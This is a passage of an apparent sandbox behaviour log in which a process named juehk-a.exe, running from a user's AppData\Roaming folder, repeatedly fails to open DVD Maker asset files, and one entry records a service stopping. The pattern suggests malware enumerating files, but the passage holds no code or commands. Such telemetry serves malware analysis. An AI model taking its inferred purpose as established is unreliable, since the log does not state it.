28151.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-highlight.png
28152.          processinfo:
28153.            pid: 1648
28154.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28155.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28156.            ads:
28157.          fid (ads:): 0
28158.          failure: open
28159.          ntstatus: 0xc0000022
28160.          CreateOptions: 0x60
28161.        file:
28162.          timestamp: 92089
28163.          mode: failed
28164.          sequenceNumber: 1989
28165.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-imageMask.png
28166.          processinfo:
28167.            pid: 1648
28168.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28169.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28170.            ads:
28171.          fid (ads:): 0
28172.          failure: open
28173.          ntstatus: 0xc0000022
28174.          CreateOptions: 0x60
28175.        file:
28176.          timestamp: 92097
28177.          mode: failed
28178.          sequenceNumber: 1990
28179.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-shadow.png
28180.          processinfo:
28181.            pid: 1648
28182.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28183.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28184.            ads:
28185.          fid (ads:): 0
28186.          failure: open
28187.          ntstatus: 0xc0000022
28188.          CreateOptions: 0x60
28189.        file:
28190.          timestamp: 92102
28191.          mode: failed
28192.          sequenceNumber: 1991
28193.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-backglow.png
28194.          processinfo:
28195.            pid: 1648
28196.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28197.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28198.            ads:
28199.          fid (ads:): 0
28200.          failure: open
28201.          ntstatus: 0xc0000022
28202.          CreateOptions: 0x60
28203.        file:
28204.          timestamp: 92109
28205.          mode: failed
28206.          sequenceNumber: 1992
28207.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-border.png
28208.          processinfo:
28209.            pid: 1648
28210.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28211.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28212.            ads:
28213.          fid (ads:): 0
28214.          failure: open
28215.          ntstatus: 0xc0000022
28216.          CreateOptions: 0x60
28217.        file:
28218.          timestamp: 92116
28219.          mode: failed
28220.          sequenceNumber: 1993
28221.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-ImageMask.png
28222.          processinfo:
28223.            pid: 1648
28224.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28225.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28226.            ads:
28227.          fid (ads:): 0
28228.          failure: open
28229.          ntstatus: 0xc0000022
28230.          CreateOptions: 0x60
28231.        file:
28232.          timestamp: 92122
28233.          mode: failed
28234.          sequenceNumber: 1994
28235.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_notes-txt-background.png
28236.          processinfo:
28237.            pid: 1648
28238.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28239.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28240.            ads:
28241.          fid (ads:): 0
28242.          failure: open
28243.          ntstatus: 0xc0000022
28244.          CreateOptions: 0x60
28245.        file:
28246.          timestamp: 92128
28247.          mode: failed
28248.          sequenceNumber: 1995
28249.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png
28250.          processinfo:
28251.            pid: 1648
28252.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28253.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28254.            ads:
28255.          fid (ads:): 0
28256.          failure: open
28257.          ntstatus: 0xc0000022
28258.          CreateOptions: 0x60
28259.        file:
28260.          timestamp: 92134
28261.          mode: failed
28262.          sequenceNumber: 1996
28263.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG.wmv
28264.          processinfo:
28265.            pid: 1648
28266.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28267.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28268.            ads:
28269.          fid (ads:): 0
28270.          failure: open
28271.          ntstatus: 0xc0000022
28272.          CreateOptions: 0x60
28273.        file:
28274.          timestamp: 92142
28275.          mode: failed
28276.          sequenceNumber: 1997
28277.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv
28278.          processinfo:
28279.            pid: 1648
28280.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28281.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28282.            ads:
28283.          fid (ads:): 0
28284.          failure: open
28285.          ntstatus: 0xc0000022
28286.          CreateOptions: 0x60
28287.        file:
28288.          timestamp: 92146
28289.          mode: failed
28290.          sequenceNumber: 1998
28291.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG.wmv
28292.          processinfo:
28293.            pid: 1648
28294.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28295.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28296.            ads:
28297.          fid (ads:): 0
28298.          failure: open
28299.          ntstatus: 0xc0000022
28300.          CreateOptions: 0x60
28301.        file:
28302.          timestamp: 92154
28303.          mode: failed
28304.          sequenceNumber: 1999
28305.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG_PAL.wmv
28306.          processinfo:
28307.            pid: 1648
28308.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28309.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28310.            ads:
28311.          fid (ads:): 0
28312.          failure: open
28313.          ntstatus: 0xc0000022
28314.          CreateOptions: 0x60
28315.        file:
28316.          timestamp: 92158
28317.          mode: failed
28318.          sequenceNumber: 2000
28319.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref.wmv
28320.          processinfo:
28321.            pid: 1648
28322.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28323.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28324.            ads:
28325.          fid (ads:): 0
28326.          failure: open
28327.          ntstatus: 0xc0000022
28328.          CreateOptions: 0x60
28329.        file:
28330.          timestamp: 92163
28331.          mode: failed
28332.          sequenceNumber: 2001
28333.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref_PAL.wmv
28334.          processinfo:
28335.            pid: 1648
28336.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28337.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28338.            ads:
28339.          fid (ads:): 0
28340.          failure: open
28341.          ntstatus: 0xc0000022
28342.          CreateOptions: 0x60
28343.        file:
28344.          timestamp: 92169
28345.          mode: failed
28346.          sequenceNumber: 2002
28347.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png
28348.          processinfo:
28349.            pid: 1648
28350.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28351.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28352.            ads:
28353.          fid (ads:): 0
28354.          failure: open
28355.          ntstatus: 0xc0000022
28356.          CreateOptions: 0x60
28357.        file:
28358.          timestamp: 92176
28359.          mode: failed
28360.          sequenceNumber: 2003
28361.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_selectionsubpicture.png
28362.          processinfo:
28363.            pid: 1648
28364.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28365.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28366.            ads:
28367.          fid (ads:): 0
28368.          failure: open
28369.          ntstatus: 0xc0000022
28370.          CreateOptions: 0x60
28371.        file:
28372.          timestamp: 92182
28373.          mode: failed
28374.          sequenceNumber: 2004
28375.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_videoinset.png
28376.          processinfo:
28377.            pid: 1648
28378.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28379.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28380.            ads:
28381.          fid (ads:): 0
28382.          failure: open
28383.          ntstatus: 0xc0000022
28384.          CreateOptions: 0x60
28385.        file:
28386.          timestamp: 92188
28387.          mode: failed
28388.          sequenceNumber: 2005
28389.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png
28390.          processinfo:
28391.            pid: 1648
28392.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28393.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28394.            ads:
28395.          fid (ads:): 0
28396.          failure: open
28397.          ntstatus: 0xc0000022
28398.          CreateOptions: 0x60
28399.        file:
28400.          timestamp: 92194
28401.          mode: failed
28402.          sequenceNumber: 2006
28403.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_SelectionSubpicture.png
28404.          processinfo:
28405.            pid: 1648
28406.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28407.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28408.            ads:
28409.          fid (ads:): 0
28410.          failure: open
28411.          ntstatus: 0xc0000022
28412.          CreateOptions: 0x60
28413.        file:
28414.          timestamp: 92200
28415.          mode: failed
28416.          sequenceNumber: 2007
28417.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_VideoInset.png
28418.          processinfo:
28419.            pid: 1648
28420.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28421.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28422.            ads:
28423.          fid (ads:): 0
28424.          failure: open
28425.          ntstatus: 0xc0000022
28426.          CreateOptions: 0x60
28427.        file:
28428.          timestamp: 92224
28429.          mode: failed
28430.          sequenceNumber: 2008
28431.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047x576black.png
28432.          processinfo:
28433.            pid: 1648
28434.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28435.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28436.            ads:
28437.          fid (ads:): 0
28438.          failure: open
28439.          ntstatus: 0xc0000022
28440.          CreateOptions: 0x60
28441.        file:
28442.          timestamp: 92231
28443.          mode: failed
28444.          sequenceNumber: 2009
28445.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047_576black.png
28446.          processinfo:
28447.            pid: 1648
28448.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28449.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28450.            ads:
28451.          fid (ads:): 0
28452.          failure: open
28453.          ntstatus: 0xc0000022
28454.          CreateOptions: 0x60
28455.        file:
28456.          timestamp: 92237
28457.          mode: failed
28458.          sequenceNumber: 2010
28459.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_ButtonGraphic.png
28460.          processinfo:
28461.            pid: 1648
28462.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28463.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28464.            ads:
28465.          fid (ads:): 0
28466.          failure: open
28467.          ntstatus: 0xc0000022
28468.          CreateOptions: 0x60
28469.        file:
28470.          timestamp: 92243
28471.          mode: failed
28472.          sequenceNumber: 2011
28473.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_SelectionSubpicture.png
28474.          processinfo:
28475.            pid: 1648
28476.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28477.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28478.            ads:
28479.          fid (ads:): 0
28480.          failure: open
28481.          ntstatus: 0xc0000022
28482.          CreateOptions: 0x60
28483.        file:
28484.          timestamp: 92250
28485.          mode: failed
28486.          sequenceNumber: 2012
28487.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_ButtonGraphic.png
28488.          processinfo:
28489.            pid: 1648
28490.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28491.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28492.            ads:
28493.          fid (ads:): 0
28494.          failure: open
28495.          ntstatus: 0xc0000022
28496.          CreateOptions: 0x60
28497.        file:
28498.          timestamp: 92256
28499.          mode: failed
28500.          sequenceNumber: 2013
28501.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_SelectionSubpicture.png
28502.          processinfo:
28503.            pid: 1648
28504.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28505.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28506.            ads:
28507.          fid (ads:): 0
28508.          failure: open
28509.          ntstatus: 0xc0000022
28510.          CreateOptions: 0x60
28511.        file:
28512.          timestamp: 92262
28513.          mode: failed
28514.          sequenceNumber: 2014
28515.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png
28516.          processinfo:
28517.            pid: 1648
28518.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28519.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28520.            ads:
28521.          fid (ads:): 0
28522.          failure: open
28523.          ntstatus: 0xc0000022
28524.          CreateOptions: 0x60
28525.        file:
28526.          timestamp: 92268
28527.          mode: failed
28528.          sequenceNumber: 2015
28529.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_SelectionSubpicture.png
28530.          processinfo:
28531.            pid: 1648
28532.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28533.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28534.            ads:
28535.          fid (ads:): 0
28536.          failure: open
28537.          ntstatus: 0xc0000022
28538.          CreateOptions: 0x60
28539.        file:
28540.          timestamp: 92274
28541.          mode: failed
28542.          sequenceNumber: 2016
28543.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push.png
28544.          processinfo:
28545.            pid: 1648
28546.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28547.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28548.            ads:
28549.          fid (ads:): 0
28550.          failure: open
28551.          ntstatus: 0xc0000022
28552.          CreateOptions: 0x60
28553.        file:
28554.          timestamp: 92280
28555.          mode: failed
28556.          sequenceNumber: 2017
28557.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\pushplaysubpicture.png
28558.          processinfo:
28559.            pid: 1648
28560.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28561.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28562.            ads:
28563.          fid (ads:): 0
28564.          failure: open
28565.          ntstatus: 0xc0000022
28566.          CreateOptions: 0x60
28567.        file:
28568.          timestamp: 92286
28569.          mode: failed
28570.          sequenceNumber: 2018
28571.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_item.png
28572.          processinfo:
28573.            pid: 1648
28574.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28575.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28576.            ads:
28577.          fid (ads:): 0
28578.          failure: open
28579.          ntstatus: 0xc0000022
28580.          CreateOptions: 0x60
28581.        file:
28582.          timestamp: 92291
28583.          mode: failed
28584.          sequenceNumber: 2019
28585.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_title.png
28586.          processinfo:
28587.            pid: 1648
28588.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28589.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28590.            ads:
28591.          fid (ads:): 0
28592.          failure: open
28593.          ntstatus: 0xc0000022
28594.          CreateOptions: 0x60
28595.        uac:
28596.          timestamp: 92300
28597.          mode: service
28598.          sequenceNumber: 2020
28599.          value: Multimedia Class Scheduler
28600.          status: stopped
28601.        file:
28602.          timestamp: 92360
28603.          mode: failed
28604.          sequenceNumber: 2021
28605.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576black.png
28606.          processinfo:
28607.            pid: 1648
28608.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28609.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28610.            ads:
28611.          fid (ads:): 0
28612.          failure: open
28613.          ntstatus: 0xc0000022
28614.          CreateOptions: 0x60
28615.        file:
28616.          timestamp: 92377
28617.          mode: failed
28618.          sequenceNumber: 2022
28619.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576_91n92.png
28620.          processinfo:
28621.            pid: 1648
28622.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28623.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28624.            ads:
28625.          fid (ads:): 0
28626.          failure: open
28627.          ntstatus: 0xc0000022
28628.          CreateOptions: 0x60
28629.        file:
28630.          timestamp: 92383
28631.          mode: failed
28632.          sequenceNumber: 2023
28633.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\15x15dot.png
28634.          processinfo:
28635.            pid: 1648
28636.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28637.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28638.            ads:
28639.          fid (ads:): 0
28640.          failure: open
28641.          ntstatus: 0xc0000022
28642.          CreateOptions: 0x60
28643.        file:
28644.          timestamp: 92389
28645.          mode: failed
28646.          sequenceNumber: 2024
28647.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\720x480icongraphic.png
28648.          processinfo:
28649.            pid: 1648
28650.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28651.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28652.            ads:
28653.          fid (ads:): 0
28654.          failure: open
28655.          ntstatus: 0xc0000022
28656.          CreateOptions: 0x60
28657.        file:
28658.          timestamp: 92395
28659.          mode: failed
28660.          sequenceNumber: 2025
28661.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_ButtonGraphic.png
28662.          processinfo:
28663.            pid: 1648
28664.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28665.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28666.            ads:
28667.          fid (ads:): 0
28668.          failure: open
28669.          ntstatus: 0xc0000022
28670.          CreateOptions: 0x60
28671.        file:
28672.          timestamp: 92402
28673.          mode: failed
28674.          sequenceNumber: 2026
28675.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png
28676.          processinfo:
28677.            pid: 1648
28678.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28679.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28680.            ads:
28681.          fid (ads:): 0
28682.          failure: open
28683.          ntstatus: 0xc0000022
28684.          CreateOptions: 0x60
28685.        file:
28686.          timestamp: 92415
28687.          mode: failed
28688.          sequenceNumber: 2027
28689.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_ButtonGraphic.png
28690.          processinfo:
28691.            pid: 1648
28692.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28693.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28694.            ads:
28695.          fid (ads:): 0
28696.          failure: open
28697.          ntstatus: 0xc0000022
28698.          CreateOptions: 0x60
28699.        file:
28700.          timestamp: 92420
28701.          mode: failed
28702.          sequenceNumber: 2028
28703.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_SelectionSubpicture.png
28704.          processinfo:
28705.            pid: 1648
28706.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28707.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28708.            ads:
28709.          fid (ads:): 0
28710.          failure: open
28711.          ntstatus: 0xc0000022
28712.          CreateOptions: 0x60
28713.        file:
28714.          timestamp: 92424
28715.          mode: failed
28716.          sequenceNumber: 2029
28717.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_ButtonGraphic.png
28718.          processinfo:
28719.            pid: 1648
28720.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28721.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28722.            ads:
28723.          fid (ads:): 0
28724.          failure: open
28725.          ntstatus: 0xc0000022
28726.          CreateOptions: 0x60
28727.        file:
28728.          timestamp: 92428
28729.          mode: failed
28730.          sequenceNumber: 2030
28731.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png
28732.          processinfo:
28733.            pid: 1648
28734.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28735.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28736.            ads:
28737.          fid (ads:): 0
28738.          failure: open
28739.          ntstatus: 0xc0000022
28740.          CreateOptions: 0x60
28741.        file:
28742.          timestamp: 92433
28743.          mode: failed
28744.          sequenceNumber: 2031
28745.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\reflect.png
28746.          processinfo:
28747.            pid: 1648
28748.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28749.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28750.            ads:
28751.          fid (ads:): 0
28752.          failure: open
28753.          ntstatus: 0xc0000022
28754.          CreateOptions: 0x60
28755.        file:
28756.          timestamp: 92437
28757.          mode: failed
28758.          sequenceNumber: 2032
28759.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png
28760.          processinfo:
28761.            pid: 1648
28762.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28763.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28764.            ads:
28765.          fid (ads:): 0
28766.          failure: open
28767.          ntstatus: 0xc0000022
28768.          CreateOptions: 0x60
28769.        file:
28770.          timestamp: 92443
28771.          mode: failed
28772.          sequenceNumber: 2033
28773.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\1047x576black.png
28774.          processinfo:
28775.            pid: 1648
28776.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28777.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28778.            ads:
28779.          fid (ads:): 0
28780.          failure: open
28781.          ntstatus: 0xc0000022
28782.          CreateOptions: 0x60
28783.        file:
28784.          timestamp: 92449
28785.          mode: failed
28786.          sequenceNumber: 2034
28787.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\203x8subpicture.png
28788.          processinfo:
28789.            pid: 1648
28790.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28791.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28792.            ads:
28793.          fid (ads:): 0
28794.          failure: open
28795.          ntstatus: 0xc0000022
28796.          CreateOptions: 0x60
28797.        file:
28798.          timestamp: 92455
28799.          mode: failed
28800.          sequenceNumber: 2035
28801.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png
28802.          processinfo:
28803.            pid: 1648
28804.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28805.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28806.            ads:
28807.          fid (ads:): 0
28808.          failure: open
28809.          ntstatus: 0xc0000022
28810.          CreateOptions: 0x60
28811.        file:
28812.          timestamp: 92462
28813.          mode: failed
28814.          sequenceNumber: 2036
28815.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\blackbars80.png
28816.          processinfo:
28817.            pid: 1648
28818.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28819.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28820.            ads:
28821.          fid (ads:): 0
28822.          failure: open
28823.          ntstatus: 0xc0000022
28824.          CreateOptions: 0x60
28825.        file:
28826.          timestamp: 92469
28827.          mode: failed
28828.          sequenceNumber: 2037
28829.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png
28830.          processinfo:
28831.            pid: 1648
28832.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28833.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28834.            ads:
28835.          fid (ads:): 0
28836.          failure: open
28837.          ntstatus: 0xc0000022
28838.          CreateOptions: 0x60
28839.        file:
28840.          timestamp: 92476
28841.          mode: failed
28842.          sequenceNumber: 2038
28843.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_SelectionSubpicture.png
28844.          processinfo:
28845.            pid: 1648
28846.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28847.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28848.            ads:
28849.          fid (ads:): 0
28850.          failure: open
28851.          ntstatus: 0xc0000022
28852.          CreateOptions: 0x60
28853.        file:
28854.          timestamp: 92482
28855.          mode: failed
28856.          sequenceNumber: 2039
28857.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_ButtonGraphic.png
28858.          processinfo:
28859.            pid: 1648
28860.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28861.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28862.            ads:
28863.          fid (ads:): 0
28864.          failure: open
28865.          ntstatus: 0xc0000022
28866.          CreateOptions: 0x60
28867.        file:
28868.          timestamp: 92489
28869.          mode: failed
28870.          sequenceNumber: 2040
28871.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png
28872.          processinfo:
28873.            pid: 1648
28874.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28875.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28876.            ads:
28877.          fid (ads:): 0
28878.          failure: open
28879.          ntstatus: 0xc0000022
28880.          CreateOptions: 0x60
28881.        file:
28882.          timestamp: 92496
28883.          mode: failed
28884.          sequenceNumber: 2041
28885.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_ButtonGraphic.png
28886.          processinfo:
28887.            pid: 1648
28888.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28889.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28890.            ads:
28891.          fid (ads:): 0
28892.          failure: open
28893.          ntstatus: 0xc0000022
28894.          CreateOptions: 0x60
28895.        file:
28896.          timestamp: 92503
28897.          mode: failed
28898.          sequenceNumber: 2042
28899.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png
28900.          processinfo:
28901.            pid: 1648
28902.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28903.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28904.            ads:
28905.          fid (ads:): 0
28906.          failure: open
28907.          ntstatus: 0xc0000022
28908.          CreateOptions: 0x60
28909.        file:
28910.          timestamp: 92509
28911.          mode: failed
28912.          sequenceNumber: 2043
28913.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask.wmv
28914.          processinfo:
28915.            pid: 1648
28916.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28917.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28918.            ads:
28919.          fid (ads:): 0
28920.          failure: open
28921.          ntstatus: 0xc0000022
28922.          CreateOptions: 0x60
28923.        file:
28924.          timestamp: 92515
28925.          mode: failed
28926.          sequenceNumber: 2044
28927.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask_PAL.wmv
28928.          processinfo:
28929.            pid: 1648
28930.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28931.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28932.            ads:
28933.          fid (ads:): 0
28934.          failure: open
28935.          ntstatus: 0xc0000022
28936.          CreateOptions: 0x60
28937.        file:
28938.          timestamp: 92522
28939.          mode: failed
28940.          sequenceNumber: 2045
28941.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_buttongraphic.png
28942.          processinfo:
28943.            pid: 1648
28944.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28945.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28946.            ads:
28947.          fid (ads:): 0
28948.          failure: open
28949.          ntstatus: 0xc0000022
28950.          CreateOptions: 0x60
28951.        file:
28952.          timestamp: 92529
28953.          mode: failed
28954.          sequenceNumber: 2046
28955.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png
28956.          processinfo:
28957.            pid: 1648
28958.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28959.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28960.            ads:
28961.          fid (ads:): 0
28962.          failure: open
28963.          ntstatus: 0xc0000022
28964.          CreateOptions: 0x60
28965.        file:
28966.          timestamp: 92535
28967.          mode: failed
28968.          sequenceNumber: 2047
28969.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png
28970.          processinfo:
28971.            pid: 1648
